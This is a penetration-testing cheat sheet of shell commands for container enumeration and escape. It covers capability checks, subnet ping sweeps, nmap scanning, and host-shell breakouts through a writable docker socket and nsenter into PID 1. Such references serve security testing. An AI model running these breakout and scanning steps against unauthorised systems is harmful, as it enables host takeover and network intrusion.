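# are we inside a container?
ls -l /.dockerenv            # Docker drops this marker file
ls -l /run/.containerenv     # podman's equivalent marker
# cgroup v1 leaks the runtime name in the cgroup path; on cgroup v2 the line
# is just "0::/" and tells you nothing, so a miss here does NOT mean "no container"
grep -E 'docker|kubepods|containerd|lxc' /proc/1/cgroup
# check if privileged - you must see the host's block devices
fdisk -l
ls /dev                      # a privileged container gets the host's full /dev
# check if privileged: the interesting caps must be in `Current:` (the
# effective set); being in the bounding set alone is not enough
# - if CapEff is all 0's the process has no effective capabilities, meaning
#   the capability-based breakouts below won't work
# - sys_ptrace / dac_read_search / dac_override are listed too because they
#   are common breakout primitives when --pid=host or host files are reachable
capsh --print | grep -E 'cap_(net_admin|sys_module|sys_chroot|sys_admin|sys_time|sys_ptrace|dac_read_search|dac_override)'
# Use this if `capsh` is not available
# - copy the CapEff (and CapPrm) hex value to the attacker machine and decode it:
#   capsh --decode=<NUMBERS>
# NOTE: Look at CapPrm and CapEff output
grep '^Cap' /proc/$$/status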
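# Extracting network information
cat /proc/net/tcp            # hex addr:port pairs; `ss -tan` / `netstat -tan` decode them if present
hostname -I
ifconfig
ip a
# Check the available IPs via arp. For example, you can find
# IP addresses of databases using these methods below.
ip neighbor
arp -a
cat /etc/hosts
# Check subnets (local addresses show up as "32 host LOCAL" entries)
grep -B1 "32 host LOCAL" /proc/net/fib_trie
# You can also do a ping sweep to see reachable IPs. Take the prefix from the
# output above rather than guessing; the defaults below are the usual docker0
# range (172.17.0.0/16) and a typical user-defined network (172.20.0.0/16).
# /24 sweep: fan out in the background, then wait for every probe to finish
NET24=${NET24:-172.17.0}
for i in {1..254}; do
  ( ping -c 1 -W 1 "${NET24}.${i}" | grep "bytes from" | grep -v "Unreachable" ) &
done
wait
# /16 sweep: the last octet only goes up to 255, so walk the third octet too
# (a single 1..65535 loop produces invalid addresses such as 172.20.0.256)
NET16=${NET16:-172.20}
for j in {0..255}; do
  for i in {1..254}; do
    ( ping -c 1 -W 1 "${NET16}.${j}.${i}" &> /dev/null && echo "${NET16}.${j}.${i}: UP" ) &
  done
  wait   # throttle: one /24 in flight at a time
done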
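# check if you can control the docker socket (a writable socket means root on
# the host); also look at the alternate path and the containerd socket
ls -l /var/run/docker.sock /run/docker.sock /run/containerd/containerd.sock 2>/dev/null
test -w /var/run/docker.sock && echo "docker.sock is writable"
# check if /proc is writable, i.e. sysrq-trigger was not masked read-only the
# way an unprivileged container normally has it. TEST it instead of writing:
# a write here acts on the HOST kernel - a digit only changes the console
# loglevel, but e.g. "c" crashes and "b" reboots the host.
test -w /proc/sysrq-trigger && echo "/proc/sysrq-trigger is writable (privileged?)"
# try to mount the host root volume (needs the docker client and access to the
# socket; the alpine image is pulled if it is not already present locally)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh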
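# docker running with --pid=host? then the process list looks like the
# host's (many host daemons, not just your entrypoint)
ps -ef
# use a statically compiled nmap and upload /usr/share/nmap (its data
# directory) alongside it; --datadir takes a path, here relative to the cwd
./nmap --datadir usr/share/nmap -sT -p1-65535 172.20.0.1-10
# enter the mount namespace of PID 1 and drop to a host shell.
# Only useful when PID 1 is the HOST init (--pid=host) and we hold
# CAP_SYS_ADMIN: if the two ns links below are identical we already share
# PID 1's mount namespace and nsenter just hands us our own container again.
readlink /proc/1/ns/mnt /proc/$$/ns/mnt
nsenter --target 1 --mount sh
# create a new user namespace with ourselves mapped to root
# (checks that unshare/user namespaces are allowed; this is NOT a breakout
# by itself - root inside the new userns has no privilege over the host)
unshare -r
# see if you can migrate to another namespace (root namespace?)
# same precondition as above: PID 1 has to be the host init for this to matter
nsenter --target 1 --all
# check hardcoded IPs and hostnames
cat /etc/hosts
# check what devices are available and mounted
mount
cat /proc/mounts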